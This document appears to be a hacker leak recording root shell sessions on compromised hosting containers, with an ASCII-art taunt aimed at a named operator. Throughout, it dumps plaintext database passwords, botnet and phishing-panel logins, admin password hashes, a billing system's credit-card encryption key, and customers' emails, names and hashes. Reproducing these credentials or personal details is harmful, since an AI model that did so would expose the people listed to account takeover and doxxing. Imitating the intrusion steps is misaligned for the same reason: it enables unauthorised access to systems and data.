stanwww  pts/0        92.241.165.69    Mon May 30 12:58 - 12:58  (00:00)    
root     pts/0        92.241.165.69    Fri May 27 09:32 - 16:07  (06:34)    
root     pts/0        92.241.165.69    Sun May 22 20:22 - 20:22  (00:00)    
root     pts/0        92.241.165.69    Sat May 21 12:08 - 14:10  (02:02)    
root     pts/0        92.241.165.69    Wed May 18 16:41 - 21:01  (04:20)    
reboot   system boot  2.6.18-238.9.1.e Wed May 18 16:08         (55+14:20)  
root     pts/1        92.241.165.69    Wed May 18 15:50 - down   (00:17)    
root     pts/0        77-20-18-64-dyni Wed May 18 12:23 - down   (03:45)    
reboot   system boot  2.6.18-238.9.1.e Wed May 18 11:45          (04:22)    

wtmp begins Wed May 18 11:45:54 2011

[root@stansecu /]# cd /home/
[root@stansecu home]# ls
admin  axfrdns  dnscache  dnslog  httpd  kloxo  lxadmin  lxlabs  nouser  stanwww  tinydns

[root@stansecu home]# cd stanwww/

[root@stansecu stanwww]# ls -la
total 44
drwxr-x---  7 stanwww apache  4096 Aug  7 17:22 .
drwxr-xr-x 13 root    root    4096 May 18 15:00 ..
-rw-r--r--  1 stanwww stanwww   33 May 18 15:00 .bash_logout
-rw-r--r--  1 stanwww stanwww  176 May 18 15:00 .bash_profile
-rw-r--r--  1 stanwww stanwww  124 May 18 15:00 .bashrc
drwxr-xr-x  2 stanwww stanwww 4096 May 18 15:00 kloxoscript
drwxr-xr-x  2 stanwww stanwww 4096 May 21 12:33 pass
drwxr-xr-x  3 stanwww stanwww 4096 Aug  7 17:22 phishingtool
drwxr-xr-x  2 root    root    4096 Oct 10 03:57 __processed_stats
lrwxrwxrwx  1 root    root      37 May 18 15:00 public_html -> /home/stanwww/stanley.secure-host.in/
-rw-r--r--  1 stanwww stanwww   11 May 18 15:00 .qmail
drwxr-xr-x 10 stanwww stanwww 4096 Sep 30 17:08 stanley.secure-host.in

[root@stansecu stanwww]# cd stanley.secure-host.in

[root@stansecu stanley.secure-host.in]# ls -la
total 220
drwxr-xr-x 10 stanwww stanwww   4096 Sep 30 17:08 .
drwxr-x---  7 stanwww apache    4096 Aug  7 17:22 ..
drwxr-xr-x  2 stanwww stanwww   4096 Jul 10 11:14 bin
drwxr-xr-x  2 stanwww stanwww   4096 May 18 15:00 cgi-bin
drwxr-xr-x  2 stanwww stanwww   4096 Aug 11  2005 images
-rwxr-xr-x  1 stanwww stanwww   1217 May 18 22:32 index.html
drwxr-xr-x  2 stanwww stanwww   4096 Jul  9 18:25 java
drwxr-xr-x  4 stanwww stanwww   4096 May 18 20:18 phishingtool
drwxr-xr-x  6 stanwww stanwww   4096 Jun  6 18:56 snapbn
-rw-r--r--  1 stanwww stanwww 175104 Jun 13 11:16 sqlite3.dll
drwxr-xr-x  7 stanwww stanwww   4096 Sep 30 16:24 umbralo
drwxr-xr-x  9 stanwww stanwww   4096 May 21 12:32 unique

[root@stansecu public_html]# cd phishingtool/

[root@stansecu phishingtool]# ls -la
total 792
drwxr-xr-x  4 stanwww stanwww   4096 May 18 20:18 .
drwxr-xr-x 10 stanwww stanwww   4096 Sep 30 17:08 ..
-rw-r--r--  1 stanwww stanwww    601 Jul 10 11:45 config.php
-rw-r--r--  1 stanwww stanwww   2121 May 18 20:17 css.css
-rw-r--r--  1 stanwww stanwww   1973 May 18 20:17 export.php
drwxr-xr-x  2 stanwww stanwww   4096 Jun 12 19:53 exports
-rw-r--r--  1 stanwww stanwww 750121 May 18 20:17 header.gif
-rw-r--r--  1 stanwww stanwww    490 May 18 20:17 im.php
-rw-r--r--  1 stanwww stanwww   1639 May 18 20:17 index.php
-rw-r--r--  1 stanwww stanwww   2230 May 18 20:17 login.php
-rw-r--r--  1 stanwww stanwww    111 May 18 20:17 logout.php
-rw-r--r--  1 stanwww stanwww   1590 May 18 20:17 logs.php
drwxr-xr-x  6 stanwww stanwww   4096 Jul 10 11:48 phishing
-rw-r--r--  1 stanwww stanwww    889 May 18 20:18 private.php

tansecu phishingtool]# cat config.php
<?php
$username = "6lJT2iDhi"; // Admin-Benutzername
$password = "8o4RLO3AE7wcarxDm8uB"; // Admin-Passwort

$dbhost = "localhost"; // Der Datenabnk-Host, meistens "localhost". Wenn es nicht funktioniert, beim Provider nachschauen bzw. nachfragen
$dbuser = "stanwww_phish"; // Datenbank-User
$dbpw = "MqKl02dmSSp"; // Datenbank-Passwort
$dbdb = "stanwww_phish"; // Name der Datenbank

////////////////////// AB HIER NICHTS MEHR ÄNDERN //////////////////////

mysql_connect($dbhost,$dbuser,$dbpw) or die ("Keine Verbindung moeglich");
mysql_select_db($dbdb) or die ("Die Datenbank existiert nicht.");
?>

root@stansecu phishingtool]# cd ..
[root@stansecu public_html]# cd snapbn/

[root@stansecu snapbn]# ls -la
total 48
drwxr-xr-x  6 stanwww stanwww 4096 Jun  6 18:56 .
drwxr-xr-x 10 stanwww stanwww 4096 Sep 30 17:08 ..
-rw-r--r--  1 stanwww stanwww 4217 Jun  6 18:56 adv_state.php
drwxr-xr-x  5 stanwww stanwww 4096 Jun  6 19:05 backend
-rw-r--r--  1 stanwww stanwww 2237 Jun  6 18:56 control.php
drwxr-xr-x  2 stanwww stanwww 4096 Oct  9 16:26 frontend
-rw-r--r--  1 stanwww stanwww 3047 Jun  6 18:56 gate.php
-rw-r--r--  1 stanwww stanwww  931 Jun  6 18:56 grab_zone.php
drwxr-xr-x  2 stanwww stanwww 4096 Jun  6 18:54 images
-rw-r--r--  1 stanwww stanwww   38 Jun  6 18:56 ip.php
drwxr-xr-x  3 stanwww stanwww 4096 Jun  6 18:56 theme

[root@stansecu snapbn]# cat backend/settings.inc.php 
<?php
//Server settings
define('DEF_THEME',		"dark"); // std. theme (only dark is available atm)
define('PANEL_ROOT',	"/home/stanwww/stanley.secure-host.in/snapbn/backend/"); // Absolute path to backend/
define('BTNET_DELAY',	120); // Delay for bot-reconnect
define('TIMEOUT',		2200);
define('DEAD_TOUT',		60*60*24*7);
define('COUNTRY_P',		3); // Min. % to be shown in the countrystats
//MySQL settings
define('MYSQL_PREFIX',	''); // MySQL Prefix (only needed if more than one btnet is hosted on one mysql database
define('MYSQL_HOST',	'localhost'); // mysql host
define('MYSQ_USER',		'stanwww_snap'); // mysql username
define('MYSQL_PASS',	'fYXgyPRB8kv'); // mysql password
define('MYSQL_DB',		'stanwww_snap'); // database name where the tables are
?>

[root@stansecu snapbn]# mysql -u stanwww_snap stanwww_snap -pfYXgyPRB8kv
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 4094
Server version: 5.0.92 Source distribution

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> SELECT COUNT(*) FROM list_bots;
+----------+
| count(*) |
+----------+
|     2553 | 
+----------+
1 row in set (0.01 sec)

mysql> SELECT * FROM list_users;
+----+----------+----------------------------------+-------------+-------+-----+
| id | nick     | passwd                           | permissions | theme | lng |
+----+----------+----------------------------------+-------------+-------+-----+
|  1 | stan     | 37a80cc8fffebfa607292c8814d89473 |         255 | dark  | en  | 
|  2 | youmetoo | 033f706d5832000e32c14ba6453ac415 |         255 | dark  | en  | 
+----+----------+----------------------------------+-------------+-------+-----+
2 rows in set (0.00 sec)

mysql> 2.5k bots ... well
mysql> Ctrl-C -- exit!
Aborted

[root@stansecu snapbn]# logout

exited from CT 140

# vzctl enter 160
Warning: Unknown iptable module: ipt_connlimit, skipped
entered into CT 160

[root@testing /]# cd /home/

[root@testing home]# ls -la
total 88
drwxr-xr-x 22 root      root     4096 Sep 23 12:07 .
drwxr-xr-x 23 root      root     4096 Oct 10 13:49 ..
drwx------  3 admin     admin    4096 May 21 11:17 admin
drwx------  2 axfrdns   axfrdns  4096 May 21 11:28 axfrdns
drwxr-x---  5 deluxa    apache   4096 Jun 15 03:57 deluxa
drwx------  2 dnscache  dnscache 4096 May 21 11:28 dnscache
drwx------  2 dnslog    dnslog   4096 May 21 11:28 dnslog
drwxr-xr-x 12 root      root     4096 Sep 23 12:07 httpd
drwxr-xr-x  6 root      root     4096 May 22 04:07 kloxo
drwxr-x---  5 lolboter  apache   4096 Aug 10 03:57 lolboter
drwxr-xr-x  3 root      root     4096 May 21 11:17 lxadmin
drwx------  2 lxlabs    lxlabs   4096 May 21 11:03 lxlabs
drwxr-x---  5 lyrex     apache   4096 Sep  1 03:57 lyrex
drwxr-x---  5 master    apache   4096 Sep 24 03:58 master
drwx------  2 nouser    nogroup  4096 May 21 11:03 nouser
drwxr-x---  5 pep       apache   4096 Jul  5 03:57 pep
drwxr-x---  6 pure      apache   4096 Jul  5 22:32 pure
drwxr-x---  5 sprueche  apache   4096 Jun 26 03:57 sprueche
drwxr-x---  5 symb      apache   4096 Jun 15 03:57 symb
drwxr-x---  5 time      apache   4096 May 22 03:57 time
drwx------  2 tinydns   tinydns  4096 May 21 11:28 tinydns
drwxr-x---  5 winfuture apache   4096 May 23 03:57 winfuture

root@testing home]# cd deluxa/

[root@testing deluxa]# ls -la
total 36
drwxr-x---  5 deluxa apache 4096 Jun 15 03:57 .
drwxr-xr-x 22 root   root   4096 Sep 23 12:07 ..
-rw-r--r--  1 deluxa deluxa   33 Jun 14 10:46 .bash_logout
-rw-r--r--  1 deluxa deluxa  176 Jun 14 10:46 .bash_profile
-rw-r--r--  1 deluxa deluxa  124 Jun 14 10:46 .bashrc
drwxr-xr-x  5 deluxa apache 4096 Jun 14 10:50 deluxa.secure-host.in
drwxr-xr-x  2 deluxa deluxa 4096 Jun 14 10:46 kloxoscript
drwxr-xr-x  2 root   root   4096 Jun 15 03:57 __processed_stats
lrwxrwxrwx  1 root   root     35 Jun 14 10:46 public_html -> /home/deluxa/deluxa.secure-host.in/
-rw-r--r--  1 deluxa deluxa   11 Jun 14 10:46 .qmail

[root@testing deluxa]# cd public_html/

[root@testing public_html]# ls
cgi-bin  images  index.html  snapbn

[root@testing public_html]# cat snapbn/
adv_state.php  backend/       control.php    frontend/      gate.php       grab_zone.php  images/        ip.php         theme/         

[root@testing public_html]# cat snapbn/backend/
classes/           flags/             GeoIP.dat          geoip.inc          index.php          js.js              language/          settings.inc.php   settings.inc.php_  system.php

[root@testing public_html]# cat snapbn/backend/settings.inc.php
<?php
//Server settings
define('DEF_THEME',		"dark"); // std. theme (only dark is available atm)
define('PANEL_ROOT',	"/home/deluxa/deluxa.secure-host.in/snapbn/backend/"); // Absolute path to backend/
define('BTNET_DELAY',	120); // Delay for bot-reconnect
define('TIMEOUT',		2200);
define('DEAD_TOUT',		60*60*24*7);
define('COUNTRY_P',		3); // Min. % to be shown in the countrystats
//MySQL settings
define('MYSQL_PREFIX',	''); // MySQL Prefix (only needed if more than one btnet is hosted on one mysql database
define('MYSQL_HOST',	'localhost'); // mysql host
define('MYSQ_USER',		'deluxa_snap'); // mysql username
define('MYSQL_PASS',	'2ynPMKCST92'); // mysql password
define('MYSQL_DB',		'deluxa_snap'); // database name where the tables are
?>

[root@testing public_html]# mysql -u deluxa_snap deluxa_snap -p2ynPMKCST92
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 602007
Server version: 5.0.92 Source distribution

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> SELECT * FROM list_users;
+----+--------+----------------------------------+-------------+-------+-----+
| id | nick   | passwd                           | permissions | theme | lng |
+----+--------+----------------------------------+-------------+-------+-----+
|  1 | deluxa | 5f4dcc3b5aa765d61d8327deb882cf99 |         255 | dark  | en  | 
+----+--------+----------------------------------+-------------+-------+-----+
1 row in set (0.00 sec)

mysql> SELECT COUNT(*) FROM list_bots;
+----------+
| COUNT(*) |
+----------+
|       45 | 
+----------+
1 row in set (0.00 sec)

mysql> Ctrl-C -- exit!
Aborted

[root@testing lolboter]# cd /home/lolboter/public_html/

[root@testing public_html]# ls -la
total 28
drwxrwxrwx 6 lolboter apache   4096 Oct 18 16:50 .
drwxr-x--- 5 lolboter apache   4096 Aug 10 03:57 ..
drwxrwxrwx 2 lolboter lolboter 4096 Aug  9 11:45 cgi-bin
drwxrwxrwx 2 lolboter lolboter 4096 Aug 11  2005 images
-rwxrwxrwx 1 lolboter lolboter 1213 Aug  9 11:45 index.html
drwxr-xr-x 3 lolboter lolboter 4096 Aug  9 13:06 snapbn
drwxrwxrwx 6 lolboter lolboter 4096 Aug  9 12:55 upload

[root@testing public_html]# cat snapbn/backend/settings.inc.php 
<?php
//Server settings
define('DEF_THEME',		"dark"); // std. theme (only dark is available atm)
define('PANEL_ROOT',	"/xampp/htdocs/t0xic.secure-host.in/snapbn/backend/"); // Absolute path to backend/
define('BTNET_DELAY',	120); // Delay for bot-reconnect
define('TIMEOUT',		2200);
define('DEAD_TOUT',		60*60*24*7);
define('COUNTRY_P',		3); // Min. % to be shown in the countrystats
//MySQL settings
define('MYSQL_PREFIX',	''); // MySQL Prefix (only needed if more than one btnet is hosted on one mysql database
define('MYSQL_HOST',	'localhost'); // mysql host
define('MYSQ_USER',		'lolboter_bot'); // mysql username
define('MYSQL_PASS',	'ovtEBKOuXxm'); // mysql password
define('MYSQL_DB',		'lolboter_bot'); // database name where the tables are

[root@testing public_html]# mysql -u lolboter_bot lolboter_bot -p
Enter password: 
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 602145
Server version: 5.0.92 Source distribution

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> SELECT * FROM list_users;
+----+-------+----------------------------------+-------------+-------+-----+
| id | nick  | passwd                           | permissions | theme | lng |
+----+-------+----------------------------------+-------------+-------+-----+
|  1 | admin | e6053eb8d35e02ae40beeeacef203c1a |         255 | dark  | en  | 
+----+-------+----------------------------------+-------------+-------+-----+
1 row in set (0.00 sec)

mysql> SELECT COUNT(*) FROM list_bots;
+----------+
| COUNT(*) |
+----------+
|      349 | 
+----------+
1 row in set (0.00 sec)

mysql> Ctrl-C -- exit!
Aborted

[root@testing public_html]# mysql -u lyrex_snap lyrex_snap -pIxBEyUkcjRy

mysql> SELECT * FROM list_users;
+----+-------+----------------------------------+-------------+-------+-----+
| id | nick  | passwd                           | permissions | theme | lng |
+----+-------+----------------------------------+-------------+-------+-----+
|  1 | lyrex | d43a389b900aff13aa56477e7f3618df |         255 | dark  | en  | 
+----+-------+----------------------------------+-------------+-------+-----+
1 row in set (0.00 sec)

mysql> SELECT COUNT(*) FROM list_bots;
+----------+
| COUNT(*) |
+----------+
|      658 | 
+----------+
1 row in set (0.01 sec)

mysql> Ctrl-C -- exit!
Aborted

[root@testing home]# logout
exited from CT 160

# vzctl enter 240
Warning: Unknown iptable module: ipt_connlimit, skipped
entered into CT 240

[root@spike /]# cd /home

[root@spike home]# ls -la
total 52
drwxr-xr-x 13 root     root     4096 Jun  7 18:11 .
drwxr-xr-x 23 root     root     4096 Oct 10 13:49 ..
drwx------  3 admin    admin    4096 May 22 13:38 admin
drwx------  2 axfrdns  axfrdns  4096 May 22 13:51 axfrdns
drwxr-x---  5 bnet     apache   4096 Jun  8 03:57 bnet
drwx------  2 dnscache dnscache 4096 May 22 13:51 dnscache
drwx------  2 dnslog   dnslog   4096 May 22 13:51 dnslog
drwxr-xr-x  3 root     root     4096 Jun  7 18:11 httpd
drwxr-xr-x  6 root     root     4096 Jun  8 04:07 kloxo
drwxr-xr-x  3 root     root     4096 May 22 13:37 lxadmin
drwx------  2 lxlabs   lxlabs   4096 May 22 13:23 lxlabs
drwx------  2 nouser   nogroup  4096 May 22 13:23 nouser
drwx------  2 tinydns  tinydns  4096 May 22 13:51 tinydns

[root@spike home]# cd httpd

[root@spike httpd]# ls -la
total 16
drwxr-xr-x  3 root root   4096 Jun  7 18:11 .
drwxr-xr-x 13 root root   4096 Jun  7 18:11 ..
-rwxr-xr-x  1 root root    111 May 22 13:51 nobody.sh
drwxrwxr-x  6 bnet apache 4096 Jun  7 18:11 spike.secure-host.in

[root@spike httpd]# cd ..

[root@spike home]# cd bnet

[root@spike bnet]# ls -la
total 36
drwxr-x---  5 bnet apache 4096 Jun  8 03:57 .
drwxr-xr-x 13 root root   4096 Jun  7 18:11 ..
-rw-r--r--  1 bnet bnet     33 Jun  7 18:11 .bash_logout
-rw-r--r--  1 bnet bnet    176 Jun  7 18:11 .bash_profile
-rw-r--r--  1 bnet bnet    124 Jun  7 18:11 .bashrc
drwxr-xr-x  2 bnet bnet   4096 Jun  7 18:11 kloxoscript
drwxr-xr-x  2 root root   4096 Sep 11 03:57 __processed_stats
lrwxrwxrwx  1 root root     32 Jun  7 18:11 public_html -> /home/bnet/spike.secure-host.in/
-rw-r--r--  1 bnet bnet     11 Jun  7 18:11 .qmail
drwxr-xr-x  5 bnet apache 4096 Jun  7 18:25 spike.secure-host.in

[root@spike bnet]# cd public_html

[root@spike public_html]# ls -la
total 24
drwxr-xr-x 5 bnet apache 4096 Jun  7 18:25 .
drwxr-x--- 5 bnet apache 4096 Jun  8 03:57 ..
drwxr-xr-x 2 bnet bnet   4096 Jun  7 18:11 cgi-bin
drwxr-xr-x 2 bnet bnet   4096 Aug 11  2005 images
-rwxr-xr-x 1 bnet bnet   1213 Jun  7 18:11 index.html
drwxr-xr-x 6 bnet bnet   4096 Jun  7 19:04 snapbn

[root@spike public_html]# cat snapbn/backend/settings.inc.php
<?php
//Server settings
define('DEF_THEME',             "dark"); // std. theme (only dark is available atm)
define('PANEL_ROOT',    "/home/bnet/spike.secure-host.in/snapbn/backend/"); // Absolute path to backend/
define('BTNET_DELAY',   120); // Delay for bot-reconnect
define('TIMEOUT',               2200);
define('DEAD_TOUT',             60*60*24*7);
define('COUNTRY_P',             3); // Min. % to be shown in the countrystats
//MySQL settings
define('MYSQL_PREFIX',  ''); // MySQL Prefix (only needed if more than one btnet is hosted on one mysql database
define('MYSQL_HOST',    'localhost'); // mysql host
define('MYSQ_USER',             'bnet_snap'); // mysql username
define('MYSQL_PASS',    'lBseTPTE7av'); // mysql password
define('MYSQL_DB',              'bnet_snap'); // database name where the tables are
?>

[root@spike public_html]# mysql -u bnet_snap bnet_snap -plBseTPTE7av
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 10731
Server version: 5.0.92 Source distribution

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> SELECT * FROM list_users;
+----+-------+----------------------------------+-------------+-------+-----+
| id | nick  | passwd                           | permissions | theme | lng |
+----+-------+----------------------------------+-------------+-------+-----+
|  1 | admin | e48e13207341b6bffb7fb1622282247b |         255 | dark  | en  |
+----+-------+----------------------------------+-------------+-------+-----+
1 row in set (0.00 sec)

mysql> SELECT COUNT(*) FROM list_bots;
+----------+
| COUNT(*) |
+----------+
|     1321 |
+----------+
1 row in set (0.01 sec)

mysql> Ctrl-C -- exit!
Aborted

[root@spike public_html]# logout
exited from CT 240

...

We could actually post content of the other VMs but, believe us,  it's
always the same sort of bullshit. Bot and stealer  panels  everywhere,
so this would just be a waste of your time ...

        ,;~;,
           /\_
          (  /
          (()      //)
          | \\  ,,;;'\
      __ _(  )m=((((((((((((((======={  Secure-Host.in  }======-------
    /'  ' '()/~' '.(, |       
 ,;(      )||     |  ~ As we already pointed out, we concluded that it
,;' \    /-(.;,   )  would be best to  crush every  single  project of
     ) /       ) /   k!LLu with our iron fist of  0day madness. One of
    //         ||   the   excrements  he  produces  is  Secure-Host.in
   )_\         )_\  formerly  known as Cyberhost.kz where he basically
offers "secure" hosting. Well by  now  it  should  be  clear  that  if
somebody like k!LLu talks about "security", he actually  has  no  clue
about that kind of topic. The  fact  is  that  he  cannot  secure  his
systems because he really does not know how. We're confident that  the
chapter 'k!LLu' can be closed once and for all now, maybe someone even
drew a lesson from it.

# pwd
/home/hosting

# ls -la
total 48
drwxr-x---   6 hosting  www      512 May 16 14:06 .
drwxr-x--x  13 root     wheel    512 Sep 22 21:06 ..
drwxrwx---  17 hosting  www     1536 May 16 14:50 cp.secure-host.in
drwxr-xr-x   2 root     www     1024 May 16 14:09 ioncube
drwxrwx---   5 hosting  www      512 Aug 19 04:51 secure-host.in
drwxrwx---   2 hosting  www    13312 Oct 16 10:48 temp

# cd secure-host.in/

# ls -laR
total 24
drwxrwx---  5 hosting  www   512 Aug 19 04:51 .
drwxr-x---  6 hosting  www   512 May 16 14:06 ..
drwxr-xr-x  2 root     www   512 May 16 20:57 fileup
drwxr-xr-x  2 root     www   512 May 20 10:12 imgupload
-rw-r--r--  1 hosting  www  1680 Aug 19 04:52 index.html
drwxr-xr-x  2 root     www   512 May 18 21:56 static

./fileup:
total 912
drwxr-xr-x  2 root     www     512 May 16 20:57 .
drwxrwx---  5 hosting  www     512 Aug 19 04:51 ..
-rw-r--r--  1 root     www  324608 May 16 20:58 Snap_SmilingBandit.exe
-rw-r--r--  1 root     www  118784 May 16 20:53 smile.exe

./imgupload:
total 4232
drwxr-xr-x  2 root     www      512 May 20 10:12 .
drwxrwx---  5 hosting  www      512 Aug 19 04:51 ..
-rw-r--r--  1 root     www  2130942 May 20 10:11 samsung.jpg

./static:
total 120
drwxr-xr-x  2 root     www    512 May 18 21:56 .
drwxrwx---  5 hosting  www    512 Aug 19 04:51 ..
-rw-r--r--  1 root     www  57198 May 18 22:08 sechost.png

# cd ..

# cd cp.secure-host.in

# ls -la
total 1296
drwxrwx---  17 hosting  www    1536 May 16 14:50 .
drwxr-x---   6 hosting  www     512 May 16 14:06 ..
-rw-r--r--   1 root     www    3013 May 16 13:31 README.txt
drwxr-xr-x   6 root     www    3584 May 16 13:34 admin
-rw-r--r--   1 root     www     430 May 16 13:31 aff.php
-rw-r--r--   1 root     www   15877 May 16 13:31 affiliates.php
-rw-r--r--   1 root     www   11667 May 16 13:31 announcements.php
-rw-r--r--   1 root     www    7513 May 16 13:31 announcementsrss.php
drwxrwxrwx   2 root     www     512 May 16 13:36 attachments
-rw-r--r--   1 root     www    6070 May 16 13:31 banned.php
-rw-r--r--   1 root     www   79378 May 16 13:31 cart.php
-rw-r--r--   1 root     www  120326 May 16 13:31 clientarea.php
-rwxrwxrwx   1 root     www     281 May 16 14:41 configuration.php
-rw-r--r--   1 root     www   16445 May 16 13:31 configuressl.php
-rw-r--r--   1 root     www    9616 May 16 13:31 contact.php
-rw-r--r--   1 root     www   13871 May 16 13:31 creditcard.php
-rw-r--r--   1 root     www   23654 May 16 13:31 dbconnect.php
-rw-r--r--   1 root     www   15873 May 16 13:31 dl.php
-rw-r--r--   1 root     www    7938 May 16 13:31 dologin.php
-rw-r--r--   1 root     www   11861 May 16 13:31 domainchecker.php
drwxrwxrwx   2 root     www     512 May 16 13:36 downloads
-rw-r--r--   1 root     www   17697 May 16 13:31 downloads.php
-rw-r--r--   1 root     www     621 May 16 13:31 htaccess.txt
drwxr-xr-x   2 root     www    1536 May 16 13:37 images
drwxr-xr-x   7 root     www    1536 May 16 13:38 includes
-rw-r--r--   1 root     www    6192 May 16 13:31 index.php
drwxr-xr-x   2 root     www    1024 May 16 13:39 install__
drwxr-xr-x   2 root     www    1024 May 16 14:11 ioncube
-rw-r--r--   1 root     www   26163 May 16 13:31 knowledgebase.php
drwxr-xr-x   2 root     www     512 May 16 13:39 lang
-rw-r--r--   1 root     www    4660 May 16 13:31 link.php
-rw-r--r--   1 root     www    4433 May 16 13:31 login.php
-rw-r--r--   1 root     www    5146 May 16 13:31 logout.php
drwxr-xr-x  10 root     www     512 May 16 13:42 modules
-rw-r--r--   1 root     www   11456 May 16 13:31 networkissues.php
-rw-r--r--   1 root     www    6321 May 16 13:31 networkissuesrss.php
drwxr-xr-x   4 root     www     512 May 16 13:43 order
-rw-r--r--   1 root     www    4271 May 16 13:31 order.php
drwxr-xr-x   2 root     www     512 May 16 13:43 pipe
-rw-r--r--   1 root     www   10548 May 16 13:31 pwreset.php
-rw-r--r--   1 root     www    9061 May 16 13:31 register.php
-rw-r--r--   1 root     www    8575 May 16 13:31 serverstatus.php
drwxr-xr-x   2 root     www     512 May 16 13:43 status
-rw-r--r--   1 root     www   17879 May 16 13:31 submitticket.php
-rw-r--r--   1 root     www   12639 May 16 13:31 supporttickets.php
drwxr-xr-x   5 root     www     512 May 16 13:32 templates
drwxrwxrwx   2 root     www   25088 Aug 11 15:05 templates_c
-rw-r--r--   1 root     www    5953 May 16 13:31 tutorials.php
-rw-r--r--   1 root     www   20858 May 16 13:31 upgrade.php
-rw-r--r--   1 root     www    5924 May 16 13:31 viewemail.php
-rw-r--r--   1 root     www   20202 May 16 13:31 viewinvoice.php
-rw-r--r--   1 root     www   17742 May 16 13:31 viewticket.php
-rw-r--r--   1 root     www    6111 May 16 13:31 whois.php
drwxr-xr-x   2 root     www     512 May 16 13:33 widgets

# cat configuration.php
<?php
$license = "123456";
$db_host = "localhost";
$db_username = "hosting_whmcs";
$db_password = "o8a7fd8s6fg";
$db_name = "hosting_whmcs";
$cc_encryption_hash = "7mdHczjQQEAI1e2KnOwGag73XQZca5h7hlFjKP0qjqZbvSLJx8fxedq2Tg4UbcSi";
$templates_compiledir = "templates_c/";
?>

# mysql -u hosting_whmcs hosting_whmcs -po8a7fd8s6fg
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 1305663
Server version: 5.0.89-log FreeBSD port: mysql-server-5.0.89

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> SHOW TABLES;
+----------------------------+
| Tables_in_hosting_whmcs    |
+----------------------------+
| tblaccounts                | 
| tblactivitylog             | 
| tbladdonmodules            | 
| tbladdons                  | 
| tbladminlog                | 
| tbladminperms              | 
| tbladminroles              | 
| tbladmins                  | 
| tbladminsecurityquestions  | 
| tblaffiliates              | 
| tblaffiliatesaccounts      | 
| tblaffiliateshistory       | 
| tblaffiliatespending       | 
| tblaffiliateswithdrawals   | 
| tblannouncements           | 
| tblbannedemails            | 
| tblbannedips               | 
| tblbillableitems           | 
| tblbrowserlinks            | 
| tblcalendar                | 
| tblcancelrequests          | 
| tblclientgroups            | 
| tblclients                 | 
| tblclientsfiles            | 
| tblconfiguration           | 
| tblcontacts                | 
| tblcredit                  | 
| tblcurrencies              | 
| tblcustomfields            | 
| tblcustomfieldsvalues      | 
| tbldomainpricing           | 
| tbldomains                 | 
| tbldomainsadditionalfields | 
| tbldownloadcats            | 
| tbldownloads               | 
| tblemails                  | 
| tblemailtemplates          | 
| tblfraud                   | 
| tblgatewaylog              | 
| tblhosting                 | 
| tblhostingaddons           | 
| tblhostingconfigoptions    | 
| tblinvoiceitems            | 
| tblinvoices                | 
| tblknowledgebase           | 
| tblknowledgebasecats       | 
| tblknowledgebaselinks      | 
| tbllinks                   | 
| tblnetworkissues           | 
| tblnotes                   | 
| tblorders                  | 
| tblpaymentgateways         | 
| tblpricing                 | 
| tblproductconfiggroups     | 
| tblproductconfiglinks      | 
| tblproductconfigoptions    | 
| tblproductconfigoptionssub | 
| tblproductgroups           | 
| tblproducts                | 
| tblpromotions              | 
| tblquoteitems              | 
| tblquotes                  | 
| tblregistrars              | 
| tblservergroups            | 
| tblservergroupsrel         | 
| tblservers                 | 
| tblsslorders               | 
| tbltax                     | 
| tblticketbreaklines        | 
| tblticketdepartments       | 
| tblticketescalations       | 
| tblticketlog               | 
| tblticketmaillog           | 
| tblticketnotes             | 
| tblticketpredefinedcats    | 
| tblticketpredefinedreplies | 
| tblticketreplies           | 
| tbltickets                 | 
| tblticketspamfilters       | 
| tblticketstatuses          | 
| tbltodolist                | 
| tblupgrades                | 
| tblwhoislog                | 
+----------------------------+
83 rows in set (0.00 sec)

mysql> SELECT table_name FROM INFORMATION_SCHEMA.columns WHERE column_name LIKE "%pass%";
+----------------------+
| table_name           |
+----------------------+
| tbladmins            | 
| tblclients           | 
| tblcontacts          | 
| tblhosting           | 
| tblservers           | 
| tblticketdepartments | 
+----------------------+
6 rows in set (0.04 sec)

mysql> SELECT username, password, firstname, lastname, email FROM tbladmins;
+----------+----------------------------------+-----------+----------+----------------------+
| username | password                         | firstname | lastname | email                |
+----------+----------------------------------+-----------+----------+----------------------+
| admin    | 850126ac86ccbb1c214a03ac909978aa | Sombra    | Ivanov   | admin@secure-host.in | 
| Olga     | 61d4019c541bf1cebf5a2a6762cd6477 | Olga      | Ivanov   | olga@secure-host.in  | 
+----------+----------------------------------+-----------+----------+----------------------+
2 rows in set (0.00 sec)

mysql> SELECT email, password, firstname, lastname FROM tblclients;
+----------------------------+----------------------------------------+-----------+-----------+
| email                      | password                               | firstname | lastname  |
+----------------------------+----------------------------------------+-----------+-----------+
| cc1cash@yahoo.de           | f4e3a18c8ea3fc34ee8277c7a9d08516:rgt%w | True      | True      | 
| wassi@wassi.de             | 12a43403362cc6accac4ccc5c30965b0:S!emh | wassi     | wassi     | 
| markus.scholz@partyheld.de | ffa8a5a23329d53577ca2e2daffcdafc:)(xUP | Smiling   | Bandit    | 
| stan.lay@hotmail.com       | 17c87c61dbed16a0f0ab99cdc83dd33c:khW)A | stanlay   | stanlay   | 
| a@a.de                     | dce096cba8c3a7fc82dc57dcdb8136ab:(Boqh | masa      | faka      | 
| Worms.s1@web.de            | f27c3d77065676f8b2807f4b0f77f7ee:!!zx% | Script    | Star      | 
| cocktopuss@hush.com        | fabc8a85b7e7b2ea8d939f44076adf01:dDeJQ | Sean      | Fakir     | 
| los_loco@mail.ru           | cddfbab06c60175699ff61f8cd27630e:%UKzg | los       | loco      | 
| hansdieter@secure-mail.biz | d2ac2a86adf8eef73645ee4c3d40b526:GMkE# | hans      | dieter    | 
